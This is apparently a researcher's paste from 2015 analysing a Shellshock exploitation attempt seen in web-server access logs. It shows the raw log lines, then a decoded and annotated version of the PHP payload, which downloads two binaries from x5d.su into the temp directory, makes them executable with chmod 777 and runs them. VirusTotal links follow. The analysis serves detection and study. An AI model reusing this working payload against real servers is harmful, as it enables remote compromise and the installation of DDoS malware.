felmoltor

Shellshock exploitation trying to download a DDoS tool

Apr 17th, 2015
  1. /*
  2. Example of Shellshock exploitation attempting to download the DDoS tool "Linux/Tsunami" from x5d.su (146.155.13.42, an address belonging to Pontificia Universidad Catolica de Chile, even though the .su TLD is the old Soviet Union one):
  3. */
  4.  
  5. [...]
  6. 188.165.247.42 - - [12/Apr/2015:23:40:37 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 31300 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
  7. 188.165.247.42 - - [12/Apr/2015:23:40:39 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 31301 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
  8. 188.165.247.42 - - [12/Apr/2015:23:40:40 +0200] "GET /cgi-mod/index.cgi HTTP/1.0" 404 31292 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
  9. 188.165.247.42 - - [12/Apr/2015:23:40:40 +0200] "GET /cgi-bin/test.cgi HTTP/1.0" 404 31292 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
  10. 188.165.247.42 - - [12/Apr/2015:23:40:41 +0200] "GET /cgi-bin-sdb/printenv HTTP/1.0" 404 31295 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
  11. 91.217.90.49 - - [12/Apr/2015:23:41:35 +0200] "GET /rom-0 HTTP/1.0" 404 31275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
  12. 27.145.148.119 - - [12/Apr/2015:23:43:47 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 31300 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
  13. 27.145.148.119 - - [12/Apr/2015:23:43:51 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 31300 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
  14. 202.29.238.196 - - [12/Apr/2015:23:43:52 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 31299 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
  15. 202.29.238.196 - - [12/Apr/2015:23:43:53 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 31301 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
  16. [...]
  17.  
  18. --------------
  19. /*
  20. Decoded script is (the -r payload from the log lines above with the single-quote splices removed; every helper is invoked through a string variable, an indirection that keeps the literal calls system()/file_put_contents()/fopen() out of the request so a naive grep for them misses it):
  21. */
  22. $a = "http://x5d.su/s/susu1"; // stage 1 download URL
  23. $b = "http://x5d.su/s/susu2"; // stage 2 download URL
  24. $c = sys_get_temp_dir();      // drop directory: the temp dir, writable by the web-server user without any privilege
  25. $d = "susu1";                 // on-disk name of stage 1
  26. $e = "susu2";                 // on-disk name of stage 2
  27. $f = "chmod 777";             // shell command prefix used to make the drops executable
  28. $g = "file_put_contents";     // function names held in strings and called as $g(...), $h(...) etc.
  29. $h = "system";
  30. $i = "file_exists";
  31. $j = "fopen";
  32.  
  33. if ($i($c . "/$d")){          // file_exists(<tmp>/susu1): a host that already holds stage 1 is skipped
  34.     exit(1);
  35. }else{
  36.     echo($c);                 // prints the temp dir; presumably lets the scanner distinguish a host that ran the payload from one that only served the 404
  37.     $g("$c/$d", $j("$a", "r"));   // file_put_contents(<tmp>/susu1, fopen(URL, "r")): fetch stage 1 over HTTP (relies on allow_url_fopen)
  38.     $g("$c/$e", $j("$b", "r"));   // same for stage 2
  39.     $h("$f " . $c ."/$d");        // system("chmod 777 <tmp>/susu1")
  40.     $h("$f " . $c ."/$e");        // system("chmod 777 <tmp>/susu2")
  41.     $h($c . "/$d");               // system("<tmp>/susu1"): execute the dropped binary
  42.     $h($c . "/$e");               // system("<tmp>/susu2")
  43. }
  44.  
  45. ----------------------
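  46. /*
  47. Translated script is (the decoded form with the string-variable aliases and the $c/$d/$e path pieces substituted; the paths are built by concatenation, sys_get_temp_dir() . "/susu1", not by interpolating the function name into a string literal, which the earlier version of this paste rendered incorrectly):
  48. */
  49. if (file_exists(sys_get_temp_dir() . "/susu1")) { // already-dropped marker: a host that holds stage 1 is skipped
  50.     exit(1);
  51. } else {
  52.     echo(sys_get_temp_dir()); // presumably lets the scanner tell a host that executed the payload from one that only returned the 404 page
  53.     file_put_contents(sys_get_temp_dir() . "/susu1", fopen("http://x5d.su/s/susu1", "r")); // fetch stage 1 over HTTP into the temp dir (relies on allow_url_fopen)
  54.     file_put_contents(sys_get_temp_dir() . "/susu2", fopen("http://x5d.su/s/susu2", "r")); // fetch stage 2
  55.     system("chmod 777 " . sys_get_temp_dir() . "/susu1"); // make both drops executable
  56.     system("chmod 777 " . sys_get_temp_dir() . "/susu2");
  57.     system(sys_get_temp_dir() . "/susu1"); // run them; detection points on the victim: susu1/susu2 appearing in the temp dir, chmod 777 spawned by the web-server user, outbound HTTP to x5d.su
  58.     system(sys_get_temp_dir() . "/susu2");
  59. }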
  60.  
  61. Links to Virustotal:
  62.  
  63. https://www.virustotal.com/en/file/3a4f90405832615a5dbe59c64e6de50c2a1a3e9b372a8605daf60960d4bef016/analysis/ (x64) 64b version
  64. https://www.virustotal.com/en/file/5e3b5056f9be5490a4332c1cc429b7d2ab12385909586bf297d145ff7d5a34af/analysis/ (i386) 32b version